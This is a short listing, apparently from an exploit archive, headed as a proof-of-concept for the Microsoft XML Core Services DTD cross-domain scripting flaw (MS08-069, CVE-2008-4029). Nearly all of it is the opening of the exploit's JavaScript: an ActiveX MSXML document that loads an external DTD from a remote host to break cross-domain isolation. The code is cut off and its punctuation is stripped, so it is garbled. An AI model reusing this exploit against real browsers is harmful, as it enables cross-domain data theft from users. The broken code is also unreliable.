Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069

No description provided by source. html body KB955218 - CVE-2008-4029 - JA script type="text/javascript" var dom = new ActiveXObject"Msxml2.DOMDocument.3.0"; dom.async = false; var url = "http://www.milw0rm.com/forfun.dtd"; var xml = "!DOCTYPE pwn SYSTEM '" + url + "'"; if dom.loadXMLxml == 0...